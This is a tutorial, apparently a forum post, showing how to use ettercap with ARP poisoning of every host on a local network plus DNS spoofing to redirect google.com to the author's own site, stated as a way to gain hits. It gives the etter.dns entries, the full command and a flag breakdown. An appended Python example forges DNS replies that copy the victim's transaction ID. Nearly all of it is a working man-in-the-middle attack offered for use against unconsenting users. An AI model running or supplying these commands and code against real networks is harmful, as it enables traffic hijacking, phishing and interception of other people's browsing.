As I said earlier we will be running ettercap; I will be using it on FreeBSD. First we need to edit the etter.dns file to add our entry.
#nano /usr/local/share/ettercap/etter.dns
There will already be an example in there that redirects microsoft.com to a Linux website.

"microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56"

To get as many hits on my website as fast as possible, I'm going to redirect google.com to my website.

"google.com A 64.148.32.238
*.google.com A 64.148.32.238
www.google.com PTR 64.148.32.238"

Now to run it, we use the following command.
#ettercap -T -q -i sk0 -P dns_spoof -M arp // //

Let me break this down for all.
-T = text interface
-q = quiet (don't print every packet)
-i = interface (sk0)
-P = plugin (dns_spoof)
-M = man in the middle method (arp poisoning)
// // = TARGET1 and TARGET2 left empty, i.e. poison all hosts

That's it: whenever anyone goes to google.com they will get redirected to wcosug.org. Notice this only works if the site you redirect to is bound directly to an IP address; it will not work with name-based virtual hosts, since etter.dns takes an IP rather than a DNS name, and the victim's browser still sends Host: www.google.com, which a shared web server will not map to your site.
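What dns_spoof does with the etter.dns entries above is simple once the packets are visible: it watches for a query it can intercept, finds the first rule that matches the name (the separate apex and *.google.com lines are needed because the wildcard covers subdomains only), and answers with a reply carrying the victim's own transaction ID and question and the attacker's IP as the A record. A resolver accepts the first such reply, so with ARP poisoning putting the attacker in the path the forged one wins. Here is an added example (not ettercap's code) that parses rules in the etter.dns two-column style, builds a query, forges the reply, and parses it back. The rules are the google.com entry from the post; the query and transaction ID are constructed.

```python
"""etter.dns-style matching and the forged reply dns_spoof sends. Added
example, not ettercap's code. RULES_TEXT is the entry from the post; the
query is constructed. A resolver accepts the first reply whose transaction
ID and question match its query, which is what the forgery relies on."""
import struct

RULES_TEXT = """
google.com      A   64.148.32.238
*.google.com    A   64.148.32.238
www.google.com  PTR 64.148.32.238
"""

QTYPE_A = 1


def parse_rules(text):
    """'name TYPE value' per line, '#' comments allowed -> list of tuples."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, rtype, value = line.split()
        rules.append((name.lower().rstrip("."), rtype.upper(), value))
    return rules


def match_a(qname, rules):
    """IP for qname from the first matching A rule; '*.x' covers subdomains of x only."""
    qname = qname.lower().rstrip(".")
    for name, rtype, value in rules:
        if rtype != "A":
            continue
        if name.startswith("*."):
            if qname.endswith(name[1:]):
                return value
        elif qname == name:
            return value
    return None


def encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg, off):
    """Read a possibly compressed name; return (name, offset after it)."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                      # compression pointer
            pointer = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, pointer)
            labels.append(tail)
            return ".".join(labels), off + 2
        off += 1
        labels.append(msg[off:off + length].decode("ascii"))
        off += length


def build_query(txid, qname, qtype=QTYPE_A):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(msg):
    txid = struct.unpack("!H", msg[:2])[0]
    qname, off = decode_name(msg, 12)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"txid": txid, "qname": qname, "qtype": qtype, "question": msg[12:off + 4]}


def forge_answer(query, rules, ttl=3600):
    """Reply the plugin would send: same txid and question, one A record."""
    q = parse_query(query)
    ip = match_a(q["qname"], rules) if q["qtype"] == QTYPE_A else None
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0)  # QR, RD, RA, NOERROR
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, ttl, 4)          # name = pointer to question
    rr += bytes(int(x) for x in ip.split("."))
    return header + q["question"] + rr


def parse_answer(msg):
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", msg[:8])
    off = 12
    for _ in range(qdcount):
        _, off = decode_name(msg, off)
        off += 4
    answers = []
    for _ in range(ancount):
        name, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append({"name": name, "ip": ".".join(str(b) for b in rdata), "ttl": ttl})
    return {"txid": txid, "is_response": bool(flags & 0x8000), "answers": answers}


RULES = parse_rules(RULES_TEXT)

if __name__ == "__main__":
    reply = forge_answer(build_query(0xBEEF, "mail.google.com"), RULES)
    print(parse_answer(reply))
```

The forged reply only changes the address, which is exactly why the virtual-host caveat holds: the victim's browser still connects with Host: www.google.com, and nothing in this exchange can alter that.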